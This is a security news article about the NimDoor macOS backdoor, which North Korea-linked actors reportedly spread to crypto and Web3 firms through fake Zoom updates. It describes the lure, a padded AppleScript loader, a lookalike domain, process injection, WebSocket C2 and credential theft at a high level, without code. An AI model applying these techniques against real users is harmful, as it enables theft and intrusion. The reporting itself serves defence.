North Korea-Linked Threat Actors Spread macOS NimDoor Malware via Fake Zoom Updates
A new threat campaign has emerged, targeting Web3 and crypto firms with a rare macOS backdoor disguised as a fake Zoom update. North Korea-linked hackers are using this tactic to spread their malware, known as NimDoor, which can persist on systems, reinfect itself if killed, and mimic legitimate AppleScript tools to avoid detection.
The threat actors employ a process injection technique and remote communications via wss (the TLS-encrypted version of the WebSocket protocol) in their attacks. This is an unusual choice for macOS threats, making NimDoor stand out from other malware variants.
How It Works
The attack chain starts with fake Zoom invites sent via Telegram and Calendly. Victims receive a script named “zoom_sdk_support.scpt” with 10,000 lines of padding and a typo (“Zook”), hiding its true function. The script fetches a second-stage payload from lookalike domains like support.us05web-zoom[.]forum, mimicking real Zoom URLs.
This launches the core malware, signaling a broader, targeted campaign with custom links per victim. The attackers dropped two Mach-O binaries (‘a' in C++, ‘installerì in Nim) to /tmp, triggering separate infection chains. One of these binaries ensures persistence with deceptive Nim binaries, while the other decrypted malware for data theft, including browser and Telegram data.
Technical Details
SentinelLABS’ analysis shows that this process is used to decrypt two embedded binaries. The first carries an ad hoc signature and the identifier Target, which is benign and appears to do nothing other than generate random numbers.
The second binary has an ad hoc signature with the identifier trojan1_arm64. This malware uses rare macOS injection, complex encryption, and WebSocket C2 comms to exfiltrate system and user data. The InjectWithDyldArm64 binary has specific entitlements to allow the injection of these payloads.
What It Means
NimDoor is written in Nim, uses encrypted communications, and steals data like browser history and Keychain credentials. Unlike typical campaigns, this variant included encrypted configs, async execution, and a unique signal-based persistence.
The threat actors are continuing to explore cross-platform languages that introduce new levels of complexity for analysts. North Korean-aligned threat actors have previously experimented with Go and Rust, similarly combining scripts and compiled binaries into multi-stage attack chains.
Nim’s rather unique ability to execute functions during compile time allows attackers to blend complex behaviour into a binary with less obvious control flow, resulting in compiled binaries in which developer code and Nim runtime code are intermingled even at the function level. This makes it difficult for analysts to detect and analyze these threats.
Conclusion
In conclusion, North Korea-linked threat actors are using fake Zoom updates to spread their NimDoor malware on macOS systems. This campaign targets Web3 and crypto firms with a rare backdoor that can persist, reinfect itself, and mimic legitimate AppleScript tools. The use of process injection techniques, encrypted communications, and cross-platform languages makes this malware particularly challenging to detect and analyze.
As the threat landscape continues to evolve, it is essential for businesses and individuals to stay vigilant and take proactive measures to protect themselves from such threats. Regularly updating software, using strong passwords, and being cautious of suspicious emails and attachments can go a long way in preventing these types of attacks.
Stay Safe Online
Remember, cybersecurity is everyone's responsibility. Stay informed about the latest threats and take steps to protect yourself and your loved ones. Follow us on Twitter, Facebook, and Mastodon for the latest security news and updates.